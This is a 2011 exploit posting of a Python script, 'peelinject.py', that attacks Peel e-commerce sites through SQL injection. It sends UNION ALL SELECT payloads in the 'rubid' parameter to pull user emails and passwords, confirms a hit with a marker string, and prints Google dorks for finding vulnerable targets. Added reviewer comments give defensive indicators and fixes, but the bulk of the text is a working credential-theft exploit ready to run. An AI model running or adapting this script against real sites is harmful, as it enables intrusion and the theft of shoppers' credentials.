
Peel E-Commerce / Shopping SQL Injection

Posted on 22 February 2011

#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname : peelinject.py
# Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version : 0.1
# greetz for d3hydr8, rsauron, low1z, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org
# More vuln in next version
# So many vuln sites to find :)
#
# Reviewer summary: Python 2 script (print statements, urllib2). Given one base
# URL on the command line, it requests six hard-coded paths whose `rubid` query
# parameter carries a UNION ALL SELECT reading `email` and `mot_passe` from a
# users table, and reports a hit when the response body contains the marker
# string "baltazar".
# NOTE(review): the page collapsed the script onto two lines; the line breaks
# and block nesting below are reconstructed from syntax -- confirm against an
# original copy. Whitespace inside string literals is kept as the page shows it.
import sys, os, re, time, urllib2

# Pick the terminal-clear command for the platform and run it at start-up.
if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)

def logo():
    # Prints the tool banner; no other effect.
    print " |---------------------------------------------------------------|"
    print "| b4ltazar[@]gmail[dot]com |"
    print "| 02/2011 peelinject.py v.0.1 |"
    print "| |"
    print "|---------------------------------------------------------------|"

# Exactly one argument (the base URL) is required; otherwise show usage and exit.
if len(sys.argv) !=2:
    logo()
    print " Ex: ./peelinject.py http://www.site.com/ "
    sys.exit(1)

# Request paths appended to the base URL. They differ in the number of selected
# columns, the position of the concatenated field, and the table name
# (peel_utilisateurs, jld_utilisateurs, utilisateurs).
# Defender notes, from the payloads as written:
# - Every request carries `union+all+select` in `rubid` and the hex literal
#   0x62616c74617a6172 (ASCII "baltazar"); both are high-signal patterns for
#   web-server log searches and WAF rules.
# - The payloads depend on `rubid` reaching the SQL query unescaped; binding it
#   as a query parameter or casting it to an integer closes this path.
# - What `mot_passe` stores (hash or plaintext) is not shown here; if these
#   requests appear in logs with successful responses, treat the affected
#   credentials as exposed.
vulnsql = ["lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--",
           "lire/index.php?rubid=1+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2+from+peel_utilisateurs--",
           "lire/index.php?rubid=1+and+1=2+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2,3+from+jld_utilisateurs--",
           "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+peel_utilisateurs--",
           "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+utilisateurs--",
           "index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--"]

# Normalise the base URL: prefix a scheme if the argument does not start with
# "http", and make sure it ends with "/".
site = sys.argv[1]
if site[:4] != "http":
    site = "http://"+site
if site [-1] != "/":
    site = site + "/"

logo()
print " [-] %s" % time.strftime("%X")
print " [+] Target:", site
print "[+]",len(vulnsql),"Vulns loaded "
# NOTE(review): the page shows a raw line break inside this literal; it is
# written here as the \n escape.
print "[+] Starting scan ... \n"

# One GET per path. No request headers are set, so urllib2's default
# User-Agent (Python-urllib/<version>) is sent -- another log indicator.
for sql in vulnsql:
    print "[+] Checking:" ,site+sql.replace(" ","")
    try:
        target = urllib2.urlopen(site+sql.replace(" ", "")).read()
        # Hit test: the marker only appears if the injected SELECT was executed
        # and its output was rendered into the page.
        if re.findall("baltazar", target):
            print"[!] w00t!,w00t!: ",site+sql.replace(" ", "")
            print
        else:
            print "[-] Sorry, can't exploit :("
            print
    # HTTP error responses are skipped without any output.
    except(urllib2.HTTPError):
        pass
    except(KeyboardInterrupt, SystemExit):
        pass

# Closing output: search-engine queries matching the affected URL pattern, then
# the finish time.
print "[!] Use this google dork for finding targets "
print " inurl:lire/index.php?rubid="
print " inurl:/index.php?rubid= "
print " [-] %s" % time.strftime("%X")

 
